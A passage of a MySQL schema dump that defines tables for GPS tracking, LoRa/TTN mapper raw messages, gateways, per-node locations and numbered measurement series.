/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpsgateway`
--
DROP TABLE IF EXISTS `gpsgateway`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpsgateway` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gpslocationid` bigint(20) NOT NULL,
`Gwid` text NOT NULL,
`Channel` int(11) NOT NULL,
`Rssi` int(11) NOT NULL,
`Snr` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=19461 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpslocation1`
--
DROP TABLE IF EXISTS `gpslocation1`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpslocation1` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Hdop` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Moment_UNIQUE` (`Moment`),
UNIQUE KEY `Id_UNIQUE` (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=4048796 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpslocation16`
--
DROP TABLE IF EXISTS `gpslocation16`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpslocation16` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Hdop` decimal(10,5) NOT NULL,
`Speed` decimal(10,5) NOT NULL,
`Direction` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Moment_UNIQUE` (`Moment`),
UNIQUE KEY `Id_UNIQUE` (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=3011 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpslocation2`
--
DROP TABLE IF EXISTS `gpslocation2`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpslocation2` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Hdop` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Moment_UNIQUE` (`Moment`),
UNIQUE KEY `Id_UNIQUE` (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=55923 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `gpslocation67`
--
DROP TABLE IF EXISTS `gpslocation67`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `gpslocation67` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Hdop` decimal(10,5) NOT NULL,
`Speed` decimal(10,5) NOT NULL,
`Direction` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`),
UNIQUE KEY `Moment_UNIQUE` (`Moment`),
UNIQUE KEY `Id_UNIQUE` (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=45487 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `location`
--
DROP TABLE IF EXISTS `location`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `location` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Nodeid` bigint(20) NOT NULL,
`Moment` datetime NOT NULL,
`Lat` decimal(10,5) NOT NULL,
`Lon` decimal(10,5) NOT NULL,
`Alt` decimal(10,5) NOT NULL,
`Speed` decimal(10,5) NOT NULL,
`Heading` decimal(10,5) NOT NULL,
`locationcol` varchar(45) NOT NULL,
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode125`
--
DROP TABLE IF EXISTS `locationnode125`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode125` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=804 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode126`
--
DROP TABLE IF EXISTS `locationnode126`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode126` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=1652 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode127`
--
DROP TABLE IF EXISTS `locationnode127`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode127` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=105 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode128`
--
DROP TABLE IF EXISTS `locationnode128`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode128` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=93 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode129`
--
DROP TABLE IF EXISTS `locationnode129`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode129` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=81 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode130`
--
DROP TABLE IF EXISTS `locationnode130`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode130` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=424 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode131`
--
DROP TABLE IF EXISTS `locationnode131`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode131` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=94 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode132`
--
DROP TABLE IF EXISTS `locationnode132`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode132` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=146 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode133`
--
DROP TABLE IF EXISTS `locationnode133`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode133` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=83 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode134`
--
DROP TABLE IF EXISTS `locationnode134`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode134` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode135`
--
DROP TABLE IF EXISTS `locationnode135`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode135` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode136`
--
DROP TABLE IF EXISTS `locationnode136`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode136` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode137`
--
DROP TABLE IF EXISTS `locationnode137`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode137` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=116 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `locationnode138`
--
DROP TABLE IF EXISTS `locationnode138`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `locationnode138` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB AUTO_INCREMENT=67 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `loraraw`
--
DROP TABLE IF EXISTS `loraraw`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `loraraw` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Data` mediumtext NOT NULL,
`Moment` datetime NOT NULL,
`Processed` tinyint(4) NOT NULL DEFAULT '0',
`Nodeid` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`),
KEY `nodeid` (`Nodeid`),
KEY `processed` (`Processed`),
KEY `moment` (`Moment`)
) ENGINE=MyISAM AUTO_INCREMENT=4812655 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `lorarawttnmapper`
--
DROP TABLE IF EXISTS `lorarawttnmapper`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `lorarawttnmapper` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Data` mediumtext NOT NULL,
`Moment` datetime NOT NULL,
`Processed` tinyint(4) NOT NULL DEFAULT '0',
`Nodeid` bigint(20) NOT NULL DEFAULT '0',
PRIMARY KEY (`Id`),
KEY `nodeid` (`Nodeid`),
KEY `processed` (`Processed`),
KEY `moment` (`Moment`)
) ENGINE=MyISAM AUTO_INCREMENT=1879750 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `lorarawttnmappergateway`
--
DROP TABLE IF EXISTS `lorarawttnmappergateway`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `lorarawttnmappergateway` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gwid` text,
`Lastmessage` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
`Alt` decimal(10,5) DEFAULT NULL,
`Ch0` bigint(20) DEFAULT '0',
`Ch1` bigint(20) DEFAULT '0',
`Ch2` bigint(20) DEFAULT '0',
`Ch3` bigint(20) DEFAULT '0',
`Ch4` bigint(20) DEFAULT '0',
`Ch5` bigint(20) DEFAULT '0',
`Ch6` bigint(20) DEFAULT '0',
`Ch7` bigint(20) DEFAULT '0',
PRIMARY KEY (`Id`),
UNIQUE KEY `Gwid` (`Gwid`(50))
) ENGINE=InnoDB AUTO_INCREMENT=3471386 DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `lorarawttnmapperlocation`
--
DROP TABLE IF EXISTS `lorarawttnmapperlocation`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `lorarawttnmapperlocation` (
`Id` bigint(11) unsigned NOT NULL AUTO_INCREMENT,
`Moment` datetime DEFAULT NULL,
`Lat` decimal(10,5) DEFAULT NULL,
`Lon` decimal(10,5) DEFAULT NULL,
`Alt` decimal(10,5) DEFAULT NULL,
`Rssi` int(11) DEFAULT NULL,
`Rawid` bigint(20) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `lorarawttnmapperlocationgwrelation`
--
DROP TABLE IF EXISTS `lorarawttnmapperlocationgwrelation`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `lorarawttnmapperlocationgwrelation` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Gwid` bigint(20) DEFAULT NULL,
`Location` bigint(20) DEFAULT NULL,
PRIMARY KEY (`Id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement`
--
DROP TABLE IF EXISTS `measurement`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement` (
`Id` bigint(20) NOT NULL AUTO_INCREMENT,
`Point` bigint(20) NOT NULL,
`Moment` datetime NOT NULL,
`Measurevalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=205 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement1`
--
DROP TABLE IF EXISTS `measurement1`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement1` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement10`
--
DROP TABLE IF EXISTS `measurement10`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement10` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement100`
--
DROP TABLE IF EXISTS `measurement100`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement100` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement101`
--
DROP TABLE IF EXISTS `measurement101`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement101` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement102`
--
DROP TABLE IF EXISTS `measurement102`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement102` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement103`
--
DROP TABLE IF EXISTS `measurement103`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement103` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement104`
--
DROP TABLE IF EXISTS `measurement104`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement104` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement105`
--
DROP TABLE IF EXISTS `measurement105`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement105` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement106`
--
DROP TABLE IF EXISTS `measurement106`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement106` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement107`
--
DROP TABLE IF EXISTS `measurement107`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement107` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement108`
--
DROP TABLE IF EXISTS `measurement108`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement108` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement109`
--
DROP TABLE IF EXISTS `measurement109`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement109` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement11`
--
DROP TABLE IF EXISTS `measurement11`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement11` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement110`
--
DROP TABLE IF EXISTS `measurement110`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement110` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement111`
--
DROP TABLE IF EXISTS `measurement111`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement111` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement112`
--
DROP TABLE IF EXISTS `measurement112`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement112` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement113`
--
DROP TABLE IF EXISTS `measurement113`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement113` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement114`
--
DROP TABLE IF EXISTS `measurement114`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement114` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement115`
--
DROP TABLE IF EXISTS `measurement115`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement115` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement116`
--
DROP TABLE IF EXISTS `measurement116`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement116` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement117`
--
DROP TABLE IF EXISTS `measurement117`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement117` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement118`
--
DROP TABLE IF EXISTS `measurement118`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement118` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement119`
--
DROP TABLE IF EXISTS `measurement119`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement119` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement12`
--
DROP TABLE IF EXISTS `measurement12`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement12` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement120`
--
DROP TABLE IF EXISTS `measurement120`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement120` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement121`
--
DROP TABLE IF EXISTS `measurement121`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement121` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement122`
--
DROP TABLE IF EXISTS `measurement122`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement122` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement123`
